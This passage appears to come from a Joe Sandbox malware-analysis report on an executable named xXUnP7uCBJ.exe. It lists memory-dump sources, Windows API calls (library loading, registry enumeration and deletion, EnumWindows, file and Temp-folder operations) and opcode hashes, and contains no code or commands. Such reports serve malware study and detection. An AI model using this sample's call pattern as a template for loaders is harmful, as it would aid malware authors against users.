                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 334405425-0
                                                                                                              • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                              • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswC272.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 397863658-0
                                                                                                              • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                              • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                              • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswC272.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3356406503-0
                                                                                                              • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                              • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                              • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                              APIs
                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 2831762973-0
                                                                                                              • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                              • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                              • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2547128583-0
                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\xXUnP7uCBJ.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1375471231-0
                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                              APIs
                                                                                                              • EnumWindows.USER32(00000000), ref: 701A2B6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1129996299-0
                                                                                                              • Opcode ID: 10429e51e7ce8f5adb28ad5d582ac4370b88e0366462c667686e6bd84a5b1c12
                                                                                                              • Instruction ID: 5db5698cc6401cbc1c21fed4c14aff07d1a199704e35ddd2a5e48c04d6da0846
                                                                                                              • Opcode Fuzzy Hash: 10429e51e7ce8f5adb28ad5d582ac4370b88e0366462c667686e6bd84a5b1c12
                                                                                                              • Instruction Fuzzy Hash: F44182FA404204EFDB21DF69DE52B5E3775EB14368F3084AAF505E7D60D638A8808BA1
                                                                                                              APIs
                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileMove
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562171763-0
                                                                                                              • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                              • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              Memory Dump Source
